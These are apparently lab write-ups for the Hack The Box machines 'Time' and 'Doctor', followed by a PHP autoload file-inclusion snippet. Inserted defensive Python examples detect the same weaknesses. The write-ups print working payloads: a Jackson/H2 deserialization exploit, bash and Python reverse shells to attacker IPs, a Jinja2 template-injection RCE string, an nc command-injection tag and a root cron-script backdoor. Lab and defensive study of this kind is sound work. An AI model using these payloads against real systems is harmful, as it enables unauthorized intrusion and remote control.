Ikonw

HTB Time Writeup

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 20:06 +08
Nmap scan report for 10.10.10.214
Host is up (0.0074s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds


Start by enumerating the HTTP port.

Unable to find any directory other than the index page.

Guess this is the only route to user.

Tried different inputs.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

We found an error message.

After googling the keywords fasterxml and jackson,

we found this CVE.

Create an inject.sql with a bash reverse shell:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')

Start a python server

python -m SimpleHTTPServer 8000

Also start a listener

nc -nvlp 8080

Finally our payload

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://x.x.x.x/inject.sql'"}]

And we got our reverse shell back.

Privilege escalation

After some enumeration, we managed to find something interesting using pspy64.

/usr/bin/timer_backup.sh is run by root.

-rwxrw-rw- 1 pericles pericles 88 Nov 7 12:50 /usr/bin/timer_backup.sh

We have write permission.

echo "bash -i >& /dev/tcp/10.10.14.22/5555 0>&1" >> /usr/bin/timer_backup.sh

and we get an easy root. But the nc session somehow exits in less than 30 seconds; another method is to write your public key and log in via SSH.

listening on [any] 5555 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.214] 33944
bash: cannot set terminal process group (230926): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
time
root@time:/# exit
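A defender's version of the check behind this finding, as an added example rather than code from the writeup: it audits a script that a privileged timer or cron job executes for group/world-writable bits, non-root ownership and a writable parent directory. The file names, the 0766 mode copied from the ls output above and the helper names are constructed for the demo.

```python
import os
import stat
import tempfile
from typing import List, Tuple


def audit_script(path: str, expected_uid: int = 0) -> List[str]:
    """Findings for a script that a privileged timer/cron job executes as expected_uid."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink: the link owner can repoint it")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_uid != expected_uid:
        findings.append(f"owned by uid {st.st_uid}, not uid {expected_uid}")
    # A strict file mode is useless if the directory lets others replace the file.
    parent = os.lstat(os.path.dirname(path) or ".").st_mode
    if parent & (stat.S_IWGRP | stat.S_IWOTH) and not parent & stat.S_ISVTX:
        findings.append("parent directory writable without sticky bit")
    return findings


def demo() -> Tuple[List[str], List[str]]:
    """Constructed sample: the writeup's 0766 script next to a 0755 copy."""
    with tempfile.TemporaryDirectory() as d:
        weak = os.path.join(d, "timer_backup.sh")
        fixed = os.path.join(d, "timer_backup_fixed.sh")
        for p in (weak, fixed):
            with open(p, "w") as f:
                f.write("#!/bin/bash\n# constructed placeholder, not the real script\n")
        os.chmod(weak, 0o766)   # -rwxrw-rw- as listed on the box
        os.chmod(fixed, 0o755)  # -rwxr-xr-x: only the owner can edit it
        return audit_script(weak), audit_script(fixed)


if __name__ == "__main__":
    for name, result in zip(("weak", "fixed"), demo()):
        print(name, result or ["ok"])
```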

HTB Doctor Writeup

Author Ikonw

Nmap

# Nmap 7.80 scan initiated Sun Sep 27 09:39:47 2020 as: nmap -Pn -sCV -p22,80,8089 -oN nmap/Full_10.129.11.0.nmap 10.129.11.0
Nmap scan report for doctor.htb (10.129.11.0)
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Starting enumeration on port 80, we found the info@doctors.htb email.

Let’s add the hostname doctors.htb to /etc/hosts

After adding it to the hosts file, visiting doctors.htb brings us to a login page.

We tried logging in as info@doctors.htb; using the password reset function, we can verify that info@doctors.htb is not a valid account.

Once we register, there’s only one function.

From the page source, we found /archive, but it appears to be a blank page.

The New Post function is vulnerable to server-side template injection.

Server Side Template Injection Payloads

When we input {{7*7}}, we notice that it is shown on the /archive page.

We can confirm that it is using either Twig or Jinja2.

Next up, craft a malicious payload to obtain a reverse connection.

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.67\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read()}}{%endif%}{%endfor%}

Another way would be using a malicious curl command; this seems to be the unintended way.

<img src=http://10.10.14.67:1337/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.67'$IFS'4444')>
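Both the Jackson/H2 payload from the Time writeup above and the template probes in this post leave distinctive marks in a request body. The following inspector is an added example, not code from either writeup: the gadget class name, JDBC fragment and template patterns are taken from the payloads shown, the sample bodies are constructed, and the function names are my own.

```python
import json
import re
from typing import Dict, List

# Gadget class and JDBC fragment taken from the Time payload.
GADGET_CLASSES = {"ch.qos.logback.core.db.DriverManagerConnectionSource"}
H2_INIT = re.compile(r"jdbc:h2:.*;INIT=RUNSCRIPT\s+FROM", re.IGNORECASE)
# Jinja2/Twig delimiters, plus the introspection names from the Doctor payload.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)
INTROSPECTION = re.compile(r"__class__|__subclasses__|__builtins__|__import__")


def inspect_body(body: str) -> List[str]:
    """Return findings for one request body; an empty list means nothing matched."""
    findings = []
    # (1) Jackson polymorphic typing serialises as a two-element array
    #     ["fully.qualified.Class", {"property": ...}].
    try:
        doc = json.loads(body)
    except ValueError:
        doc = None
    if (isinstance(doc, list) and len(doc) == 2
            and isinstance(doc[0], str) and isinstance(doc[1], dict)):
        if doc[0] in GADGET_CLASSES:
            findings.append(f"jackson gadget class: {doc[0]}")
        if H2_INIT.search(str(doc[1].get("url", ""))):
            findings.append("h2 INIT=RUNSCRIPT in jdbc url")
    # (2) Template delimiters in user content are the {{7*7}} probe stage;
    #     introspection names mean the author is walking towards os.popen.
    if TEMPLATE_EXPR.search(body):
        findings.append("template expression in body")
        if INTROSPECTION.search(body):
            findings.append("python object introspection in template")
    return findings


# Constructed sample bodies (the attacker host is the placeholder x.x.x.x).
SAMPLE_BODIES = {
    "time_payload": '["ch.qos.logback.core.db.DriverManagerConnectionSource",'
                    '{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
                    'INIT=RUNSCRIPT FROM \'http://x.x.x.x/inject.sql\'"}]',
    "ssti_probe": "title={{7*7}}&content=hello",
    "ssti_exec": "{% for x in ().__class__.__base__.__subclasses__() %}"
                 "{% if \"warning\" in x.__name__ %}...{% endif %}{% endfor %}",
    "benign": '{"title": "Doctor appointment", "content": "See you at 7*7"}',
}


def scan_all() -> Dict[str, List[str]]:
    return {name: inspect_body(body) for name, body in SAMPLE_BODIES.items()}
```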

WWW-data to User

Going to the /home directory, we found the user shaun.

We found the user's password in /var/log/apache/backup.

And we can switch to the user shaun.

Using the privilege escalation suggester, we learned that Splunk is vulnerable.

By using https://github.com/cnotin/SplunkWhisperer2 we are able to escalate privileges to root.

The initial foothold is more annoying; from www-data to user to root is easy.

PHP::in_array() Type Juggling
<?php
function __autoload($className) {
    include $className; // includes whatever file name the caller supplied
}

$controllerName = $_GET['c'];
$data = $_GET['d'];

if (class_exists($controllerName)) { // triggers __autoload with the request value
    $controller = new $controllerName($data);
    $controller->render();
} else {
    echo 'There is no page with this name';
}

class HomeController {
    private $data;

    public function __construct($data) {
        $this->data = $data;
    }

    public function render() {
        if ($this->data['new']) {
            echo 'controller rendering new response';
        } else {
            echo 'controller rendering old response';
        }
    }
}
?>

The first vulnerability is in line 9. According to the PHP manual:

class_exists

class_exists - This function checks whether or not the given class has been defined.

class_exists ( string $class_name, bool $autoload = true) : bool

Parameters

class_name
The class name. The name is matched in a case-insensitive manner.

autoload
Whether or not to call __autoload by default.

In this case, the class_exists function checks whether the controller name we pass in is valid, but it first has to call the autoload function to make sure the class is loaded. When this happens, it actually includes the unknown $className parameter we passed in.
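An added example, not part of the original audit note: a small regex-based checker (my own, not a real SAST tool) that flags PHP files where a request-controlled variable reaches class_exists() or `new $var` while an autoloader includes its argument without validating it. The PHP sample is the dispatcher part of the snippet above, embedded as a constructed string so the reported line numbers match the post.

```python
import re
from typing import List

REQUEST_SOURCES = re.compile(r"\$(\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")
AUTOLOADER = re.compile(r"function\s+__autoload\s*\(\s*\$(\w+)\s*\)\s*\{(.*?)\}", re.DOTALL)
CLASS_SINKS = re.compile(r"class_exists\s*\(\s*\$(\w+)|new\s+\$(\w+)")


def audit_php(src: str) -> List[str]:
    """Findings for one PHP file; an empty list means the pattern was not seen."""
    findings = []
    tainted = set(REQUEST_SOURCES.findall(src))           # variables fed from the request
    unsafe_autoload = False
    for param, body in AUTOLOADER.findall(src):
        # The autoloader is unsafe when its parameter goes straight to include/require.
        if re.search(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$" + re.escape(param) + r"\b", body):
            unsafe_autoload = True
            findings.append(f"__autoload includes its ${param} argument unvalidated")
    for m in CLASS_SINKS.finditer(src):
        var = m.group(1) or m.group(2)
        if var not in tainted:
            continue
        line = src.count("\n", 0, m.start()) + 1
        sink = "class_exists" if m.group(1) else "new"
        msg = f"line {line}: request-controlled ${var} reaches {sink}"
        if sink == "class_exists" and unsafe_autoload:
            msg += " (autoload turns this into file inclusion)"
        findings.append(msg)
    return findings


# Constructed input: the vulnerable dispatcher from the post, without the else branch.
PHP_SAMPLE = """<?php
function __autoload($className) {
    include $className;
}

$controllerName = $_GET['c'];
$data = $_GET['d'];

if (class_exists($controllerName)) {
    $controller = new $controllerName($data);
    $controller->render();
}
"""
```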
